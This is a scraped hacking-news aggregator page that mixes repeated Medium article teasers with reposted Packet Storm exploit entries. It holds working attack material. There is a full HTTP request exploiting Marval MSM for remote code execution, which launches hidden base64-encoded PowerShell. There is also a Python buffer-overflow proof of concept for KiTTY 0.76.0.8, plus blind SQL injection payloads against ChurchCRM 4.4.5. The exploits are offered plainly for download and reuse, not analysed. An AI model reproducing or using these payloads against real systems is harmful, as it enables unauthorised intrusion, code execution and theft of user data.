Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HackThisSite Extended Basic Mission 8
https://cdn-images-1.medium.com/max/700/0*74mYc4VpuPKWiWvH.jpg
Next mission requires us to help Bill Gates. As a guy who’s seen VB code I understand hopping to PERL for simple scripting.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
HackThisSite Extended Basic Mission 8
https://cdn-images-1.medium.com/max/700/0*74mYc4VpuPKWiWvH.jpg
Next mission requires us to help Bill Gates. As a guy who’s seen VB code I understand hopping to PERL for simple scripting.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
HackThisSite Extended Basic Mission 8
Next mission requires us to help Bill Gates. As a guy who’s seen VB code I understand hopping to PERL for simple scripting.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
DDoS Attacks Detection in Cloud Computing Environment
https://cdn-images-1.medium.com/max/640/0*T264-rhoOJTptXl4.png
DDoS Attacks Detection in Cloud Computing Environment
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
DDoS Attacks Detection in Cloud Computing Environment
https://cdn-images-1.medium.com/max/640/0*T264-rhoOJTptXl4.png
DDoS Attacks Detection in Cloud Computing Environment
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
DDoS Attacks Detection in Cloud Computing Environment
DDoS Attacks Detection in Cloud Computing Environment
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
The new update in Google Chrome was found guilty.
https://cdn-images-1.medium.com/max/628/0*KVO2mxaoBtF8yfNX.jpg
Google Chrome was found guilty:
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
The new update in Google Chrome was found guilty.
https://cdn-images-1.medium.com/max/628/0*KVO2mxaoBtF8yfNX.jpg
Google Chrome was found guilty:
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
The new update in Google Chrome was found guilty.
Google Chrome was found guilty:
Exploit Collector
Zyxel Buffer Overflow / Format String / Command Injection
___________________________
@hacking_Attack
@Hacking_Video
Zyxel Buffer Overflow / Format String / Command Injection
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Zyxel Buffer Overflow / Format String / Command Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Marval MSM 14.19.0.12476 Remote Code Execution
https://4.bp.blogspot.com/-Nd-X_KvCLtU/WWlu3jy7alI/AAAAAAAAIIw/wd38Z8AjxRAJh0AdUZMKadOiqPJQRSLMgCLcBGAs/s1600/h101.png
Marval MSM version 14.19.0.12476 suffers from a remote code execution vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Marval MSM 14.19.0.12476 Remote Code Execution
https://4.bp.blogspot.com/-Nd-X_KvCLtU/WWlu3jy7alI/AAAAAAAAIIw/wd38Z8AjxRAJh0AdUZMKadOiqPJQRSLMgCLcBGAs/s1600/h101.png
Marval MSM version 14.19.0.12476 suffers from a remote code execution vulnerability.
SHA-256 |
24316b7779883d5d8d50e2cb1ecce4deee3f5d5a6946a039d5aca7dd24c9a076Download
# Exploit Title: Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)
# Date: 27/5/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.marvalnorthamerica.com/
# Software Link: https://www.marvalnorthamerica.com/
# Version: v14.19.0.12476
# Tested on: Windows
# Detailed blog: https://cyber-guy.gitbook.io/cyber-guy/blogs/marval-msm-rce
POST /MSM_Test/RFP/Forms/ScriptHandler.ashx?method=ProcessScript&classPath=%2FMSM_Test%2FRFP%2FForms%2FScriptMaintenance.aspx&classMode=WXr8G2r3eh0wvNjbiIT6aYVgZATjWlaZW0UFQrQrcAku4qWefyYTUu%2BzULTTON0fQaLjNtnCW7VX%2Fj1rYPDpKKN%2F8HPLGRSpVbdvPaR4mPIrSr4Aj22VMuIDEkMTpPhoq3gX8p4TBir56GBTJcpLv1agwKPB%2BWI%2F2TlU%2FjQKzz0%3D HTTP/2
Host: MSMHandler.io
Cookie: ASP.NET_SessionId=arrsgikvbwbagdsvetfvphbu; appNameAuth=B3D1490922B24585684E139359F3BB93D8D92468A906B1FEA01EB4CF760A23DC90BF30327784677BBC00C5860C145602EF39BB9BEBB6A451E57DBF42C47B7D0CDE09F4CE15D2A5BEBFFCE5A7BFCF7DED8D8B17036F2BCE3DDA873B542EED614B9B42E4B5E4AA18BBE32CC0EB864E6825C898A2F465A42E871DF13F19845E171697D5E23688EAD29D3F6B221DBF18002DE5B929DBA88D42B4B518BC95F5BC5F3A3D36722F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 456
Origin: https://MSMHandler.io
Dnt: 1
Referer: https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptMaintenance.aspx?id=3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
type=%221%22&content=%22%5Cn%5CnFunction+Pwn()%5Cn++Set+shell+%3D+CreateObject(%5C%22wscript.Shell%5C%22)%5Cn%5Cn%5Cn++++shell.run+%5C%22powershell.exe+-nop+-w+hidden+-E+%5C%22%5C%22JAB2AGEAcgA9AGgAbwBzAHQAbgBhAG0AZQA7AG4AcwBsAG8AbwBrAHUAcAAgAGsAcgBmADUAbAB2AGYANABzAGUAdABtAGoAMgB2AG4AZABiADUAOQBsADQAdgBtAGcAZABtADUAawB0ADkALgAkAHYAYQByAC4AbwBhAHMAdABpAGYAeQAuAGMAbwBtAA%3D%3D%5C%22%5C%22%5C%22%5Cn%5Cn%5CnEnd+Function%5Cn%5CnPwn%22&id=%2226%22&isCi=true
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Marval MSM 14.19.0.12476 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Kitty 0.76.0.8 Stack Buffer Overflow
https://2.bp.blogspot.com/-KCLJyqafybo/WWlvfwHA-LI/AAAAAAAAIQI/MCuUzFpEyfsyWr-64Egm7HXW4FQP4atdgCLcBGAs/s1600/h88.png
Kitty version 0.76.0.8 suffers from a buffer overflow vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitty 0.76.0.8 Stack Buffer Overflow
https://2.bp.blogspot.com/-KCLJyqafybo/WWlvfwHA-LI/AAAAAAAAIQI/MCuUzFpEyfsyWr-64Egm7HXW4FQP4atdgCLcBGAs/s1600/h88.png
Kitty version 0.76.0.8 suffers from a buffer overflow vulnerability.
SHA-256 |
3e2bfa45aa4308b003d19647b041b8d31a6ee476ab638d84af244829934d5f7cDownload
# Exploit Title: Kitty 0.76.0.8 Stack Buffer Overflow
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-06-08
# Vendor Homepage: http://www.9bis.net/kitty/index.html#!index.md
# Software Link : https://www.fosshub.com/KiTTY.html?dwl=kitty_portable-0.76.0.8.exe
# Tested Version: 0.76.0.8
# Vulnerability Type: Buffer Overflow
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
# Description: Kitty 0.76.0.8 Stack Buffer Overflow
# Steps to reproduce:
# 1. - Run the python script and it will create exploit.txt file.
# 3. - Kitty 0.76.0.8
# 4. - Sessions -> Save
# 5. - Paste the characters of txt to Saved/Sessions then click save
# 6. - Crashed
# Note: ECX Overwwrite
#!/usr/bin/python
exploit = 'A' * 2091
try:
file = open("exploit.txt","w")
file.write(exploit)
file.close()
print("POC is created")
except:
print("POC not created")
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitty 0.76.0.8 Stack Buffer Overflow
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Infiray IRAY-A8Z3 1.0.957 Code Execution / Overflow / Hardcoded Credentials
___________________________
@hacking_Attack
@Hacking_Video
Infiray IRAY-A8Z3 1.0.957 Code Execution / Overflow / Hardcoded Credentials
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Infiray IRAY-A8Z3 1.0.957 Code Execution / Overflow / Hardcoded Credentials
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
ChurchCRM 4.4.5 SQL Injection
https://3.bp.blogspot.com/-nGXsE6SnJzg/WWlu_4hmLPI/AAAAAAAAIKI/Orx5Bzmw2Dg1C2Ys8CQM09j0YgXq__7zgCLcBGAs/s1600/h120.png
ChurchCRM version 4.4.5 suffers from a remote SQL injection vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
ChurchCRM 4.4.5 SQL Injection
https://3.bp.blogspot.com/-nGXsE6SnJzg/WWlu_4hmLPI/AAAAAAAAIKI/Orx5Bzmw2Dg1C2Ys8CQM09j0YgXq__7zgCLcBGAs/s1600/h120.png
ChurchCRM version 4.4.5 suffers from a remote SQL injection vulnerability.
SHA-256 |
c6734b9cfce832dff774c0d27700820ddbb3e687bf6c1a7e71caa63a84f2a804Download
## Title: ChurchCRM 4.4.5 SQLi session hijacking L2
## Author: nu11secur1ty
## Date: 05.11.2022
## Vendor: https://churchcrm.io/
## Software: https://github.com/ChurchCRM/CRM
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325
## Description:
There is a SQL Injection PWN cookie hijacking session vulnerability - broken authentication sanitary logic, in ChurchCRM 4.4.5 via the 'PersonID' parameter in the WhyCameEditor.php app.
The authenticated user can get all information for all users on this system when he hit an active session and use this active session in L2 network or even an external network - domain.
Status: Highly Vulnerable
[+] Payloads:
```mysql
---
Parameter: PersonID (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: PersonID=(SELECT (CASE WHEN (6445=6445) THEN 1 ELSE (SELECT 2844 UNION SELECT 1058) END))&WhyCameID=1&linkBack=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: PersonID=1 AND (SELECT 7116 FROM (SELECT(SLEEP(5)))xUOx)&WhyCameID=1&linkBack=
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325)
## Proof and Exploit:
[href](https://streamable.com/ust7qt)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
ChurchCRM 4.4.5 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Marval MSM 14.19.0.12476 Cross Site Request Forgery
https://2.bp.blogspot.com/-U4x-65bW3GQ/WWlvNN9osvI/AAAAAAAAIMY/h5EIQTz5wbsbDMf6z0LfMa0yML4cI035gCLcBGAs/s1600/h21.png
Marval MSM version 14.19.0.12476 suffers from a cross site request forgery vulnerability.
SHA-256 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Marval MSM 14.19.0.12476 Cross Site Request Forgery
https://2.bp.blogspot.com/-U4x-65bW3GQ/WWlvNN9osvI/AAAAAAAAIMY/h5EIQTz5wbsbDMf6z0LfMa0yML4cI035gCLcBGAs/s1600/h21.png
Marval MSM version 14.19.0.12476 suffers from a cross site request forgery vulnerability.
SHA-256 |
aecc677dbeadf1e311ca918427b11abd363470e74f04e5d771a7638543fba47cDownload
# Exploit Title: Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)
# Date: 27/5/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.marvalnorthamerica.com/
# Software Link: https://www.marvalnorthamerica.com/
# Version: v14.19.0.12476
# Tested on: Windows
# PoCs: https://drive.google.com/drive/folders/1Zy5Oa-maLo0ACfLz90uvxqxwG18DwAZY
# 2FA Bypass:
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Marval MSM 14.19.0.12476 Cross Site Request Forgery
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.